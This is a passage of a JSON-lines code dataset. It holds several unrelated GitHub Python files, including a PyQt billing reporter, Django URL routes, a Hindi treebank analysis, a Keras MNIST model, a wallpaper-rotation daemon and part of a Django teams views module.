self.ui.label_date.setText(self.query.value(0))\n self.ui.label_orderId.setText(self.query.value(1))\n self.ui.label_roomId.setText(self.query.value(2))\n self.ui.label_userLevel.setText(mapUserLevel_c2w(self.query.value(3)))\n self.ui.label_cost.setText(str(round(self.query.value(4), 2)))\n self.ui.label_discount.setText(discountFormat(self.query.value(5)))\n self.ui.label_receive.setText(str(round(self.query.value(6), 2)))\n\n def printBill(self):\n pass\n\n\nclass Reporter(QWidget):\n def __init__(self, db, server):\n super().__init__()\n self.db = db\n self.server = server\n self.query = self.db.query\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Reporter.Ui_Form()\n self.ui.setupUi(self)\n # resize column both on content and stretch\n header = self.ui.tbDetail.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(2, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(3, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(10, QHeaderView.ResizeToContents)\n header = self.ui.tbBillList.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.ui.dateEdit.setDate(QDate.currentDate())\n\n self.ui.btRefresh.clicked.connect(self.slotRefTb)\n self.ui.btSettle.clicked.connect(self.slotSettle)\n self.ui.tabWidget.currentChanged.connect(self.slotChangePage)\n self.ui.dateEdit.dateChanged.connect(self.slotSelectDate)\n\n self.detailList = DetailList(self.ui, self.db)\n self.billList = BillList(self.ui, self.db)\n\n def slotSelectDate(self, date):\n self.detailList.showDetailList(date)\n self.billList.showBillList(date)\n\n def slotRefTb(self):\n self.ui.dateEdit.setDate(QDate.currentDate())\n self.detailList.showDetailList()\n self.billList.showBillList()\n\n def slotChangePage(self, idx):\n self.ui.dateEdit.setDate(QDate.currentDate())\n if idx == 0:\n self.detailList.showDetailList()\n elif idx == 1:\n self.billList.showBillList()\n\n def slotSettle(self):\n roomId, res = QInputDialog.getText(self, '请输入房间号', '房间号')\n if not res: return\n if not roomId:\n msg = '房间号不能为空'\n QMessageBox().warning(self, '房间号为空', msg, QMessageBox.Yes, 
QMessageBox.Yes)\n return\n isOpening, client = self.isOpening(roomId)\n if isOpening:\n msg = '当前房间空调尚未关机,是否强制关机?'\n res = QMessageBox().warning(self, '空调尚未关机', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n if res == QMessageBox.No: return\n self.disClient(client)\n self.detailList.saveDetail(client)\n if self.hasSettled(roomId):\n msg = '该房间号不存在或已结账!'\n QMessageBox().warning(self, '房间号', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n self.settleAccount(roomId)\n\n def hasSettled(self, roomId):\n sql = 'SELECT * FROM detail_list WHERE orderID = \"0\" AND roomID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return False if self.query.value(0) else True\n\n def isOpening(self, roomId):\n for client in self.server.serveQueue + self.server.waitQueue + self.server.tempQueue:\n if client.roomId == roomId:\n return True, client\n return False, None\n\n def disClient(self, client):\n client.room_temp_timer.stop()\n client.energy_timer.stop()\n client.sock.abort()\n client.closeTime = time.time()\n\n def getUserLevel(self, roomId):\n sql = 'SELECT userLevel FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def calcTotalCost(self, roomId):\n sql = 'SELECT SUM(cost) FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def setOrderId(self, roomId):\n orderId = str(int(time.time()))\n sql = 'UPDATE detail_list SET orderID = ? WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, orderId)\n self.query.bindValue(1, roomId)\n self.db.sqlExec()\n return orderId\n\n def settleAccount(self, roomId):\n userLevel = self.getUserLevel(roomId)\n cost = self.calcTotalCost(roomId)\n # start a transaction\n if self.db.dbh.transaction():\n orderId = self.setOrderId(roomId)\n self.billList.addBill(orderId, roomId, userLevel, cost)\n if not self.db.dbh.commit():\n logger.error(self.db.dbh.lastError().text())\n if not self.db.dbh.rollback():\n logger.error(self.db.dbh.lastError().text())\n msg = '结账过程出错!'\n QMessageBox().critical(self, '结账失败', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n self.bill = Bill(self.db, orderId)\n self.bill.show()\n","repo_name":"Hk4Fun/qtstudy","sub_path":"AirConditioningV2/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"38146584232","text":"from django.urls import path\nfrom . import views\n\napp_name = \"users\"\n\nurlpatterns = [\n path(\"login/\", views.LoginView.as_view(), name=\"login\"),\n path(\"login/github/\", views.github_login, name=\"github_login\"),\n path(\"login/github/callback/\", views.github_callback, name=\"github_callback\"),\n path(\"login/kakao/\", views.kakao_login, name=\"kakao_login\"),\n path(\"login/kakao/callback/\", views.kakao_callback, name=\"kakao_callback\"),\n path(\"logout/\", views.logout_view, name=\"logout\"),\n path(\"signup/\", views.SignUpView.as_view(), name=\"signup\"),\n path(\n \"verify//\",\n views.complete_verification,\n name=\"complete_verification\",\n ),\n path(\"/\", views.UserProfileView.as_view(), name=\"profile\"),\n path(\"edit-profile/\", views.EditProfileView.as_view(), name=\"edit_profile\"),\n path(\"password-change/\", views.UpdatePassword.as_view(), name=\"password_change\"),\n path(\"switch-hosting/\", views.switch_hosting_mode, name=\"switch-hosting\"),\n path(\"switch-lang/\", views.switch_lang, name=\"switch-lang\"),\n]\n","repo_name":"KJYoung/airbnbV","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"8705389657","text":"# -*- coding: utf-8 -*-\nfrom io import open\n# from conllu import parse\n\nwith open(\"hindi.conllu\", 'r') as file:\n temp = file.read()\n\nfrom collections import defaultdict\nimport itertools\nfrom collections import Counter\n\n\"\"\"**Solution 1a**\"\"\"\nprint(\"----------Solution 1a------------\")\ndef freqPOSword(parseText):\n posTag = defaultdict(int)\n for sentence in parseText:\n for word in sentence:\n # posTag[(word['upos'],word['form'])] += 1\n posTag[word['upos']] += 1\n posTag = dict(sorted(posTag.items(), key=lambda item: item[1] ,reverse=True))\n # return dict(itertools.islice(posTag.items(), 50))\n return posTag\n\nparseText = parse(temp)\nposTag = freqPOSword(parseText)\nprint(posTag)\n\n\"\"\"**Solution 1b**\"\"\"\nprint(\"----------Solution 1b------------\")\ndef freq50Pos():\n freq50most = dict()\n for sentence in parseText:\n for word in sentence:\n wordlist = freq50most.get(word['upos'],[])\n wordlist.append(word['form'])\n freq50most[word['upos']] = wordlist\n\n finaldict = dict()\n for key, wordlist in freq50most.items():\n posWord = dict(Counter(wordlist))\n posWord = dict(sorted(posWord.items(), key=lambda item: item[1] ,reverse=True))\n posWord = dict(itertools.islice(posWord.items(), 50))\n finaldict[key] = posWord\n print(key, posWord)\n return finaldict\n\nfreq50mostdict = freq50Pos()\n\n\"\"\"**Solution 1c** \"\"\"\nprint(\"----------Solution 1c------------\")\ndef findfreqGender(morphfeature):\n genderfreq = defaultdict(int)\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morphfeature,'')\n if genstr != '':\n genderfreq[genstr] += 1\n return genderfreq\n\ngenderfreq = findfreqGender('Gender')\nprint('-------Gender--------')\nfor key, value in genderfreq.items():\n print(key, value)\ngenderfreq = findfreqGender('Case')\nprint('\\n-------Case----------')\nfor key, value in genderfreq.items():\n print(key, value)\nprint('\\n-------Number--------')\ngenderfreq = findfreqGender('Number')\nfor key, value in genderfreq.items():\n print(key, value)\n\n#find freq of Gender, case, number of words \ndef genFreq(morfeature):\n genderfreq = dict()\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morfeature,'')\n if genstr != '':\n genlist = genderfreq.get(genstr,[])\n genlist.append(word['form'])\n genderfreq[genstr] = genlist\n \n finalgenfreq = dict()\n for key, genlist in genderfreq.items():\n finalgenfreq[key] = dict(itertools.islice(dict(sorted(dict(Counter(genlist)).items(), key=lambda item: item[1] ,reverse=True)).items(),50))\n return finalgenfreq\n\ngenderfreq = genFreq('Gender')\nfor key, value in genderfreq.items():\n print(key, value)\n\ncasefreq = genFreq('Case')\nfor key, value in casefreq.items():\n print(key, value)\n\nnumberfreq = genFreq('Number')\nfor key, value in numberfreq.items():\n print(key, value)\n\n\"\"\"**Solution 1d**\"\"\"\nprint(\"----------Solution 1d------------\")\nfreq50Comb = defaultdict(int)\n\nfor sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get('Gender','')\n casestr = featdict.get('Case','')\n numstr = featdict.get('Number','')\n if genstr != '' and casestr != '' and numstr != '':\n freq50Comb[(genstr, casestr, numstr)] += 1\n\nfreq50Comb = dict(sorted(dict(freq50Comb).items(), key=lambda item: item[1] ,reverse=True))\nfreq50Comb\n\n\"\"\"**Solution 
1e**\"\"\"\nprint(\"----------Solution 1e------------\")\n\nheaddict = dict()\n\ndef POShead():\n headdict = dict()\n for sentence in parseText:\n for word in sentence:\n if word['misc']['ChunkType'] == 'head':\n headlist = headdict.get(word['upos'], [])\n headlist.append(word['form'])\n headdict[word['upos']] = headlist\n\n finalheaddict = dict()\n for key, headlist in headdict.items():\n headCount = dict(sorted(dict(Counter(headlist)).items(), key=lambda item: item[1] ,reverse=True))\n finalheaddict[key] = headCount\n print(key, headCount)\n return finalheaddict\n\nheaddict = POShead()\n\n\"\"\"**Solution 1f**\"\"\"\nprint(\"----------Solution 1f------------\")\n\ndef getdirectedPOS():\n directedPOS = dict()\n # def getdirectedPOS():\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n # eachlist = directedPOS.get(word['deprel'], [])\n eachlist = directedPOS.get(mytup, [])\n eachlist.append(word['deprel'])\n directedPOS[mytup] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndirectedPOS = getdirectedPOS()\n\n# 1.f -> part 1\nallTuples = list(directedPOS.keys())\nprint(allTuples)\n\ntotaldirectedPOS = defaultdict(int)\n\nfor key1, eachlist in directedPOS.items():\n for key2 , eachitem in eachlist.items():\n totaldirectedPOS[key1] += eachitem\n print(key1, totaldirectedPOS[key1])\n\n\"\"\"**Solution 1g**\"\"\"\nprint(\"----------Solution 1g------------\")\n\ndef dependencyR():\n directedPOS = dict()\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n eachlist = directedPOS.get(word['deprel'], [])\n eachlist.append(mytup)\n directedPOS[word['deprel']] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndependencyRfreq = dependencyR()\n\ndepenRtotalfreq = defaultdict(int)\n\nfor key1, eachlist in dependencyRfreq.items():\n for key2 , eachitem in eachlist.items():\n depenRtotalfreq[key1] += eachitem\n print(key1, depenRtotalfreq[key1])\n\n","repo_name":"saqeeb360/Computational-Linguistics","sub_path":"Assignment2/Q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"74166080749","text":"import sys\nsys.path.insert(0, '../..')\n\nimport pyrosim\nimport math\n\nsim = pyrosim.Simulator(play_paused=True,debug=True,eval_time=5000)\n\n\n#for i in range(10):\n# segment = sim.send_cylinder(x=0,y=(-0.5-i),z=0.5, r=0,g=1,b=0,length=0.5,r1=0,r2=1,r3=0,radius=0.1,)\n\nsegment = [sim.send_cylinder(x=0,y=(0.5+i),z=0.5, r=((i+1)%2),g=(i%2),b=(i*3%2),length=.9,r1=0,r2=1,r3=0,radius=0.1) for i in range (10)]\n\njoint = [sim.send_hinge_joint(first_body_id=segment[i],second_body_id=segment[i+1],x=0,y=i+1,z=.5,n1=((i+1)%2),n2=0,n3=(i%2)) for i in range(9)]\n\nsensor = [sim.send_touch_sensor(body_id=segment[i]) for i in range(10)]\n\nsneuron = [sim.send_sensor_neuron(sensor[i]) for i in range(10)]\n\nmneuron = [sim.send_motor_neuron(joint[i]) for i in range(9)]\n\nsynapse = [sim.send_developing_synapse(sneuron[i],mneuron[i],start_weight=-10,end_weight=10,start_time=0, end_time=1) for i in range(9)]\n\nsim.start()\n","repo_name":"erichmatt/ludocrap","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40627961216","text":"class Solution:\n def addDigits(self, num: int) -> int:\n if num==0: return 0\n x=[]\n while (num):\n x.append(num%10)\n num=num//10\n ans=x[0]\n if len(x)==1:\n return int(ans)\n p=sum(x)\n return self.addDigits(p)\n ","repo_name":"ShivGamer007/ShivCodeSxLeeTcode","sub_path":"0258-add-digits/0258-add-digits.py","file_name":"0258-add-digits.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10457036955","text":"'''Calculate the sum of two numbers.\nRepeat the code to check the sum for 5 sets of numbers.\nWrite Pseudocode, draw flow chart and python code using while loop.\n'''\ncounter=1\nwhile(counter<=5):\n print(\"Set \",counter)\n n1=int(input(\"Enter the first number: \"))\n n2 = int(input(\"Enter the second number: \"))\n sum=n1+n2\n print(\"Sum of \",n1,\" and \",n2,\" is: \",sum)\n counter=counter+1\n","repo_name":"murshi-dev/PythonCodes","sub_path":"PytthonBasics/Chapter11n12Activity/FindSum5Setnumbers.py","file_name":"FindSum5Setnumbers.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"3693395042","text":"import pyautogui as pag\nfrom time import sleep\n\ndef countdown():\n timer = 3\n\n while(timer != 0):\n print(timer)\n timer -= 1\n sleep(1)\n\ndef mine():\n pag.keyDown('o')\n sleep(1)\n pag.keyUp('o')\n sleep(2)\n\ncountdown()\n\n\nwhile(True):\n mine()","repo_name":"JSONCarrillo/Random-Python-Scripts","sub_path":"MC-Auto-Miner/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"42958563836","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 17:27:46 2018\n\n@author: Avinash Tiwari\n\"\"\"\n\nfrom keras.datasets import mnist\nimport matplotlib. pyplot as plt\n\n# Load dataset (download if needed)\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nplt.subplot(221)\nplt.imshow(X_train[0], cmap=plt.get_cmap('gray'))\nplt.subplot(222)\nplt.imshow(X_train[1], cmap=plt.get_cmap('gray'))\nplt.subplot(223)\nplt.imshow(X_train[2], cmap=plt.get_cmap('gray'))\nplt.subplot(224)\nplt.imshow(X_train[3], cmap=plt.get_cmap('gray'))\n\nplt.show()\n\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.image_data_format()\n\n# fix the seed \nseed = 7\nnumpy.random.seed(seed)\n\nX_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')\n\nX_train = X_train / 255\nX_test = X_test / 255\n\n# one hot encoding\n# output - [ 0 0 0 0 0 1 0 0 0 0 ]\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\nnum_classes = y_train.shape[1]\n\ndef baseline_model():\n model = Sequential()\n model.add(Conv2D(8, (3,3), input_shape=(1,28,28), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n \n model.add(Flatten())\n model.add(Dense(4, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n \n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n \n return model\n\n# build a model\nmodel = baseline_model()\n\n# Fit \nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3,\n batch_size=32, verbose=2)\n\nmodel.save('model.h5')\n\n# Final eval\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"CNN error: %.2f%%\" % (100 - scores[1]*100))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"AvinashTiwari/Artifical-intelligence","sub_path":"10_Docker_ml/Chap6-ML-Image/img-reco-train.py","file_name":"img-reco-train.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"}
+{"seq_id":"70046188911","text":"# 유니버셜 함수\n# ufunc라고 불리는 유니버셜 함수는 ndarray 안에 있는 데이터 원소별로 연산을 수행하는 함수다.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\narr = np.arange(10)\nprint(np.sqrt(arr))\nprint(np.exp(arr))\n\n# 단항/ 이항 유니버셜 함수가 있다.\n\n# 배열을 사용한 데이터 처리\n# 넘피 배열을 사용해서 반복문을 명시적으로 제거하는 기법을 흔히 벡터화라고 한다. 이는 순수 파이썬 연산에 비해 빠르다.\n\npoints = np.arange(-5, 5, 0.01)\nxs, ys = np.meshgrid(points, points)\n\nz = np.sqrt(xs ** 2 + ys ** 2)\nprint(z)\n\nplt.imshow(z, cmap=plt.cm.gray);\nplt.colorbar()\n\nplt.title(\"graph\")\nplt.show()\n\n# 배열 연산으로 조건절 표현하기\nxarr = np.array([1.1, 1.2, 1.3, 1.4, 1.5])\nyarr = np.array([2.1, 2.2, 2.3, 2.4, 2.5])\ncond = np.array([True, False, True, True, False])\n\n# 하기의 표현식과\nresult = [(x if c else y) for x, y, c in zip(xarr, yarr, cond)]\nprint(result)\n# 하기의 표현식은 같다.\nresult2 = np.where(cond, xarr, yarr)\nprint(result2)\n","repo_name":"JisangYou/Python","sub_path":"Samples_2019/PfDA/np3.py","file_name":"np3.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71889353069","text":"import re\nimport os\nimport json\nimport shlex\nimport random\nimport signal\nimport getpass\nimport threading\nimport subprocess\n\n\n################################################################################\n############################### Global variables ###############################\n################################################################################\n\n# System configurations\nROTATE_CMD = 'gsettings set org.gnome.desktop.background picture-uri file://%s'\nDEVNULL = open(os.devnull, 'wb')\n\n# Regex patterns\nREGEX_IMAGE = r'\\.(png|jpg|jpeg)$'\n\nwallpaper_path = None\nrotate_delay = None\nsleep_event = threading.Event()\nterminate = False\nimages = []\n\n\n################################################################################\n############################### Helper functions ###############################\n################################################################################\n\ndef interrupt_handler(sig_num, frame):\n \"\"\"Handle system signal interrupts\"\"\"\n global terminate\n if sig_num != signal.SIGUSR1:\n terminate = True\n sleep_event.set()\n\n\ndef shell_escape(cmd):\n \"\"\"Trivial shell escaping of a command\"\"\"\n return \"'\" + cmd.replace(\"'\", \"'\\\\''\") + \"'\"\n\n\ndef load_images():\n \"\"\"Reload images from source directory\"\"\"\n global images, wallpaper_path\n images = []\n for img in os.listdir(wallpaper_path):\n if re.search(REGEX_IMAGE, img, re.IGNORECASE):\n images.append(os.path.join(wallpaper_path, img))\n\n\n################################################################################\n################################# Script start #################################\n################################################################################\n\nif __name__ == \"__main__\":\n # Load the configuration file\n configs = None\n for path in [os.getcwd(), os.path.dirname(os.path.realpath(__file__))]:\n config_path = os.path.join(path, 'wallchd.json')\n if os.path.exists(config_path):\n with open(config_path) as conf_file:\n configs = json.loads(conf_file.read())\n break\n wallpaper_path = configs['wallpaper_path']\n rotate_delay = configs['rotate_delay']\n\n # Handle signals\n signal.signal(signal.SIGINT, interrupt_handler)\n signal.signal(signal.SIGTERM, interrupt_handler)\n signal.signal(signal.SIGUSR1, interrupt_handler)\n\n # Main event loop\n cycle_err = False\n while not terminate:\n if cycle_err:\n sleep_event.wait(5)\n sleep_event.clear()\n cycle_err = True\n\n # TODO(jtsai): Only reload images if the directory has been changed.\n try:\n load_images()\n except OSError:\n continue\n\n # HACK(jtsai): We need to get the DBUS_SESSION_BUS_ADDRESS in order for\n # Gnome settings command to properly work. 
For this hack, we pull the\n # D-Bus session from the environments of the actively running\n # gnome-session under the current user that wallchd is running under.\n SESSION_REGEX = r'/(gnome|cinnamon)-session(\\s+|$)'\n DBUS_REGEX = r'^DBUS_SESSION_BUS_ADDRESS=(.*)'\n dbus_addr = None\n for pid in [x for x in os.listdir('/proc') if x.isdigit()]:\n try:\n exe = os.path.realpath('/proc/%s/exe' % pid)\n except OSError:\n continue\n if re.search(SESSION_REGEX, exe):\n with open('/proc/%s/environ' % pid) as envs:\n for env in envs.read().split('\\0'):\n res = re.search(DBUS_REGEX, env)\n if res:\n dbus_addr = res.groups()[0]\n if dbus_addr is None:\n continue\n os.environ['DBUS_SESSION_BUS_ADDRESS'] = dbus_addr\n os.environ['DISPLAY'] = ':0'\n\n # Change the background image\n image_path = shell_escape(random.choice(images))\n cmd_str = ROTATE_CMD % image_path\n cmd = shlex.split(cmd_str)\n subprocess.Popen(cmd, stdout = DEVNULL, stderr = DEVNULL).wait()\n\n # Sleep rotation delay\n sleep_event.wait(rotate_delay)\n sleep_event.clear()\n cycle_err = False\n","repo_name":"dsnet/wallchd","sub_path":"wallchd.py","file_name":"wallchd.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10456587819","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\ndef DFS(S):\n if S > T :\n return\n if S == T :\n res.add(tuple(check))\n else :\n for i in range(K) :\n if check[i] < PN[i][1] :\n check[i] += 1\n DFS(S+PN[i][0])\n check[i] -= 1\n\nif __name__ == '__main__':\n T = int(input())\n K = int(input())\n PN = list()\n for _ in range(K) :\n p, n = map(int, input().split())\n PN.append((p,n))\n check = [0]*K\n res = set()\n DFS(0)\n print(len(res))","repo_name":"tlgus626/CodingTest","sub_path":"ch6/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15753520458","text":"import logging\nimport random\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q, Count\nfrom django.http import Http404, HttpResponseForbidden, HttpResponseRedirect, HttpResponse, HttpResponseBadRequest\nfrom django.shortcuts import get_object_or_404, redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.utils import simplejson as json\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic.list_detail import object_list\n\nimport teams.moderation_const as MODERATION\nimport widget\nfrom apps.auth.models import UserLanguage, CustomUser as User\nfrom apps.videos.templatetags.paginator import paginate\nfrom messages import tasks as notifier\nfrom teams.forms import (\n CreateTeamForm, AddTeamVideoForm, EditTeamVideoForm,\n AddTeamVideosFromFeedForm, TaskAssignForm, SettingsForm, TaskCreateForm,\n PermissionsForm, WorkflowForm, InviteForm, TaskDeleteForm,\n GuidelinesMessagesForm, RenameableSettingsForm, ProjectForm, LanguagesForm,\n UnpublishForm, MoveTeamVideoForm, UploadDraftForm\n)\nfrom teams.models import (\n Team, TeamMember, Invite, Application, TeamVideo, Task, Project, Workflow,\n Setting, TeamLanguagePreference, autocreate_tasks\n)\nfrom teams.permissions import (\n can_add_video, can_assign_role, can_assign_tasks, can_create_task_subtitle,\n can_create_task_translate, can_view_tasks_tab, can_invite,\n roles_user_can_assign, can_join_team, can_edit_video, can_delete_tasks,\n can_perform_task, can_rename_team, can_change_team_settings,\n can_perform_task_for, can_delete_team, can_review, can_approve,\n can_delete_video, can_remove_video\n)\nfrom teams.search_indexes import TeamVideoLanguagesIndex\nfrom teams.signals import api_teamvideo_new, api_subtitles_rejected\nfrom teams.tasks import (\n invalidate_video_caches, invalidate_video_moderation_caches,\n update_video_moderation, update_one_team_video\n)\nfrom utils import render_to, render_to_json, DEFAULT_PROTOCOL\nfrom utils.forms import flatten_errorlists\nfrom utils.panslugify import pan_slugify\nfrom utils.searching import get_terms\nfrom utils.translation import get_language_choices, languages_with_labels\nfrom videos import metadata_manager\nfrom videos.tasks import (\n upload_subtitles_to_original_service, delete_captions_in_original_service,\n delete_captions_in_original_service_by_code\n)\nfrom videos.models import Action, VideoUrl, SubtitleLanguage, SubtitleVersion\nfrom widget.rpc import add_general_settings\nfrom widget.views import base_widget_params\n\n\nimport sentry_logger # Magical import to make Sentry's error recording happen.\nassert sentry_logger # It's okay, Pyflakes. 
Trust me.\nlogger = logging.getLogger(\"teams.views\")\n\n\nTASKS_ON_PAGE = getattr(settings, 'TASKS_ON_PAGE', 20)\nTEAMS_ON_PAGE = getattr(settings, 'TEAMS_ON_PAGE', 10)\nMAX_MEMBER_SEARCH_RESULTS = 40\nHIGHTLIGHTED_TEAMS_ON_PAGE = getattr(settings, 'HIGHTLIGHTED_TEAMS_ON_PAGE', 10)\nCUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS = getattr(settings, 'CUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS', 20)\n\nVIDEOS_ON_PAGE = getattr(settings, 'VIDEOS_ON_PAGE', 16)\nMEMBERS_ON_PAGE = getattr(settings, 'MEMBERS_ON_PAGE', 15)\nAPLICATIONS_ON_PAGE = getattr(settings, 'APLICATIONS_ON_PAGE', 15)\nACTIONS_ON_PAGE = getattr(settings, 'ACTIONS_ON_PAGE', 20)\nDEV = getattr(settings, 'DEV', False)\nDEV_OR_STAGING = DEV or getattr(settings, 'STAGING', False)\n\n\ndef index(request, my_teams=False):\n q = request.REQUEST.get('q')\n\n if my_teams and request.user.is_authenticated():\n ordering = 'name'\n qs = Team.objects.filter(members__user=request.user)\n else:\n ordering = request.GET.get('o', 'members')\n qs = Team.objects.for_user(request.user).annotate(_member_count=Count('users__pk'))\n\n if q:\n qs = qs.filter(Q(name__icontains=q)|Q(description__icontains=q))\n\n order_fields = {\n 'name': 'name',\n 'date': 'created',\n 'members': '_member_count'\n }\n order_fields_name = {\n 'name': _(u'Name'),\n 'date': _(u'Newest'),\n 'members': _(u'Most Members')\n }\n order_fields_type = {\n 'name': 'asc',\n 'date': 'desc',\n 'members': 'desc'\n }\n order_type = request.GET.get('ot', order_fields_type.get(ordering, 'desc'))\n\n if ordering in order_fields and order_type in ['asc', 'desc']:\n qs = qs.order_by(('-' if order_type == 'desc' else '')+order_fields[ordering])\n\n highlighted_ids = list(Team.objects.for_user(request.user).filter(highlight=True).values_list('id', flat=True))\n random.shuffle(highlighted_ids)\n highlighted_qs = Team.objects.filter(pk__in=highlighted_ids[:HIGHTLIGHTED_TEAMS_ON_PAGE]) \\\n .annotate(_member_count=Count('users__pk'))\n\n extra_context = {\n 'my_teams': my_teams,\n 'query': q,\n 'ordering': ordering,\n 'order_type': order_type,\n 'order_name': order_fields_name.get(ordering, 'name'),\n 'highlighted_qs': highlighted_qs,\n }\n return object_list(request, queryset=qs,\n paginate_by=TEAMS_ON_PAGE,\n template_name='teams/teams-list.html',\n template_object_name='teams',\n extra_context=extra_context)\n\n@render_to('teams/videos-list.html')\ndef detail(request, slug, project_slug=None, languages=None):\n team = Team.get(slug, request.user)\n filtered = 0\n\n if project_slug is not None:\n project = get_object_or_404(Project, team=team, slug=project_slug)\n else:\n project = None\n\n query = request.GET.get('q')\n sort = request.GET.get('sort')\n language = request.GET.get('lang')\n\n if language:\n filtered = filtered + 1\n\n if language != 'none':\n qs = team.get_videos_for_languages_haystack(\n language, user=request.user, project=project, query=query, sort=sort)\n else:\n qs = team.get_videos_for_languages_haystack(\n num_completed_langs=0, user=request.user, project=project, query=query, sort=sort)\n\n extra_context = widget.add_onsite_js_files({})\n\n extra_context['all_videos_count'] = team.get_videos_for_languages_haystack(\n None, user=request.user, project=None, query=None, sort=sort).count()\n\n extra_context.update({\n 'team': team,\n 'project':project,\n 'can_add_video': can_add_video(team, request.user, project),\n 'can_edit_videos': can_add_video(team, request.user, project),\n 'filtered': filtered\n })\n\n if extra_context['can_add_video'] or extra_context['can_edit_videos']:\n 
